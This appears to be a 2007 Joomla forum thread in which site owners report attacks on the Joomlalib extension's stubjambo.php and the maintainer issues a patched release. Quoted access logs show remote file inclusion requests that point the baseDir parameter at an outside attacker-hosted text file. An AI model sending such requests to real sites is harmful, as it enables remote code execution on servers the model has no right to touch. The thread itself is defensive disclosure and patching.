| Joomla! http://forum.joomla.org/ |
|
| Remote File Inclusion: Joomlalib - All versions http://forum.joomla.org/viewtopic.php?f=296&t=213774 |
Page 1 of 1 |
| Author: | dazzor [ Tue Sep 18, 2007 8:00 am ] |
| Post subject: | Remote File Inclusion: Joomlalib - All versions |
Hi, my provider has sand me an email with the message there was a hack attempt on the server true my site. according to the log 'the hacker' included an external URL in stubjambo.php. What can i do about this? is use joomla 1.0.13 latest php and mysql |
|
| Author: | infograf768 [ Tue Sep 18, 2007 9:55 am ] |
| Post subject: | Re: hacking attempt com_joomlalib |
Hack attempt does not mean the crack has been done. Please ask your provider to quote the log concerning this. Also, which version of Joomlalib and/or bsq_sitestats are you using? |
|
| Author: | dazzor [ Tue Sep 18, 2007 11:47 am ] |
| Post subject: | Re: hacking attempt com_joomlalib |
log: Quote: scoutingranst.be 211.175.61.131 - - [18/Sep/2007:01:09:27 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.freewe btown.com/v3nom/id.txt? HTTP/1.1" 200 52 "-" "libwww-perl/5.79" i have no idea what version of Joomlalib or bsq_sitestats, the one that comes with Joomla 1.0.12 |
|
| Author: | infograf768 [ Tue Sep 18, 2007 1:42 pm ] |
| Post subject: | Re: hacking attempt com_joomlalib |
They do not come with Joomla. These are 3rd party extensions. |
|
| Author: | dazzor [ Wed Sep 19, 2007 6:39 am ] |
| Post subject: | Re: hacking attempt com_joomlalib |
ah, but i still have no idea. Any idea where i can find this? |
|
| Author: | RussW [ Wed Sep 19, 2007 6:47 am ] |
| Post subject: | Re: hacking attempt com_joomlalib |
Please log in to your Joomla! Administrator site, list the components and there you will see the versions of the installed items and their appropriate authoers websites. Check on the authors websites for updates and/or known exploits, also check their forums for similar problems, these are not core Joomla! extensions. |
|
| Author: | Protozoan [ Wed Sep 19, 2007 4:36 pm ] |
| Post subject: | Remote File Inclusion: Joomlalib - All versions |
Affected component: Joomlalib (necessary for the Gallery2 component) The log file: x - - [19/Sep/2007:00:21:00 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://xxxx/tmp/echo3? HTTP/1.1" 200 924 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" File contains: Code: <? /** Create a Joomla/Mambo environment for our example programs * @package examples */ $baseDir = dirname(__FILE__) . '/'; /** */ define('_VALID_MOS', 1); //Pretend we're Joomla require_once($baseDir.'../../../globals.php'); require_once($baseDir.'../../../configuration.php'); require_once($baseDir .'../../../includes/mambo.php'); $database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix ); $GLOBALS['database'] = $database; ?> What do you guys suggest as fix? |
|
| Author: | infograf768 [ Thu Sep 20, 2007 4:11 am ] |
| Post subject: | Re: hacking attempt com_joomlalib |
Merging with similar thread. Looks like joomlalib is indeed at stake. |
|
| Author: | 55thinking [ Thu Sep 20, 2007 8:23 am ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
is there a fix available ? We affected...and we are not using the mentionned component, it got injected in our install |
|
| Author: | amacide [ Thu Sep 20, 2007 10:53 am ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Hi, This is actively being exploited. I don't think the affected file is normally used if at all - others may be able to confirm... Unfortunately the exploited $baseDir affects Joomla further along the processing so fixing in this file not seem to help. If $baseDir is set in request, then abort going no further. This may break your sites - works fine for me. Code: if(isset($_REQUEST['baseDir'])) { return FALSE;} Cheers, Code: <?
/** Create a Joomla/Mambo environment for our example programs * @package examples */} if(isset($_REQUEST['baseDir'])) { return FALSE;} $baseDir = dirname(__FILE__) . '/'; /** */ define('_VALID_MOS', 1); //Pretend we're Joomla require_once($baseDir.'../../../globals.php'); require_once($baseDir.'../../../configuration.php'); require_once($baseDir .'../../../includes/mambo.php'); $database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix ); $GLOBALS['database'] = $database; ?> |
|
| Author: | Protozoan [ Thu Sep 20, 2007 8:10 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
amacide wrote: Hi, This is actively being exploited. I don't think the affected file is normally used if at all - others may be able to confirm... Unfortunately the exploited $baseDir affects Joomla further along the processing so fixing in this file not seem to help. If $baseDir is set in request, then abort going no further. This may break your sites - works fine for me. Code: if(isset($_REQUEST['baseDir'])) { return FALSE;} Cheers, Code: <? /** Create a Joomla/Mambo environment for our example programs * @package examples */} if(isset($_REQUEST['baseDir'])) { return FALSE;} $baseDir = dirname(__FILE__) . '/'; /** */ define('_VALID_MOS', 1); //Pretend we're Joomla require_once($baseDir.'../../../globals.php'); require_once($baseDir.'../../../configuration.php'); require_once($baseDir .'../../../includes/mambo.php'); $database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix ); $GLOBALS['database'] = $database; ?> Fix works here without complications. Thanks for your quick response. |
|
| Author: | hamsel [ Fri Sep 21, 2007 6:54 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
This is certainly at risk! If the injected php code is to be believed, the attack goes way beyond the individual site being hacked for phishing purposes and right into the host's system accounts. I've sent a copy of the injected code to infograf678 - I hope he will comment on the code here, if he gets the time... /hamsel |
|
| Author: | infograf768 [ Sat Sep 22, 2007 8:32 am ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Sending mails around... |
|
| Author: | trompete [ Sat Sep 22, 2007 2:19 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Hi, Infograf was nice enough to make me aware of this vulnerability. I don't think this file is being used either. I'll do a code review since it's been 9 months since I looked at it (life > internet). I'll release a new package with this file removed as soon as I can. Brent |
|
| Author: | trompete [ Sat Sep 22, 2007 2:25 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Where did JoomlaLib and BSQ go on the extensions site? That wasn't very nice. |
|
| Author: | trompete [ Sat Sep 22, 2007 2:40 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
I posted a new version here: http://joomlacode.org/gf/project/joomlalib/frs/ I still can't find the extension site entries to update them, but here's the fixed version. |
|
| Author: | infograf768 [ Sat Sep 22, 2007 2:49 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Brent, Thanks for your fast reply. JED admins took it off until fix made. Usual policy. We were very much worrying this morning about these reports  BSQ sitestats is concerned but also the Gallery2 extension I guess. Please let ot2sen (Ole) know when you have uploaded new versions on joomlacode for the components too. JM |
|
| Author: | ot2sen [ Sat Sep 22, 2007 3:25 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
trompete wrote: I posted a new version here: http://joomlacode.org/gf/project/joomlalib/frs/ I still can't find the extension site entries to update them, but here's the fixed version. BSQ and Gallery2Bridge published again. Feel welcomed to update descriptions and version info. Thanks
|
|
| Author: | dracula [ Tue Oct 09, 2007 11:44 am ] |
| Post subject: | Site hacked through joomlalib |
I have posted the problem in the dev forum of joomlalib, so I will just post here the link the their forum. [url=http://forum.4theweb.nl/showthread.php?p=5020#post5020] http://forum.4theweb.nl/showthread.php?p=5020#post5020[/url] From my point of view, the newest joomlalib is also affected! |
|
| Author: | infograf768 [ Tue Oct 09, 2007 1:47 pm ] |
| Post subject: | Re: Site hacked through joomlalib |
Moving to the related thread. |
|
| Author: | infograf768 [ Tue Oct 09, 2007 1:48 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
@trompete Can you look into that? |
|
| Author: | trompete [ Tue Oct 09, 2007 1:52 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Later. It's office hours here in the USA. I should be able to look at 8 PM CST (GMT - 6) |
|
| Author: | Michiel_1981 [ Tue Oct 09, 2007 2:19 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
infograf768 wrote: @trompete Can you look into that? Just looked into this with trompete, and there is NO know include like this in the code anymore, we emptied the file completly in the latest release. so post complete file content and file name! So we can look into this. kind regards, Michiel EDIT: forgot 1 word |
|
| Author: | infograf768 [ Tue Oct 09, 2007 2:25 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Thanks folks. 
|
|
| Author: | dracula [ Tue Oct 09, 2007 3:14 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
thanks. didn't see this topic. and the latest link I found on 4theweb.nl was going to a 1.3.1 version which still had the problem. |
|
| Author: | geoffjones [ Sat Mar 21, 2009 7:52 pm ] |
| Post subject: | Re: Remote File Inclusion: Joomlalib - All versions |
Just looked at my error logs and this exploit is still being tried. Found the source from 4 origins, just in one day: [RussW IP Addresses Removed, pointless exercise, these could be other compromised sites, via proxies or hijaked, the IP Address potentially mean nothing and do not assist with issue diagnosis or resolution ] Put these in http://ip-address-lookup-v4.com/ to see their origins!!!!!!!!!! I am running 1.0.15, and this directory/file does not reside on my website. |
|
| Page 1 of 1 | All times are UTC |
| Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group http://www.phpbb.com/ |
|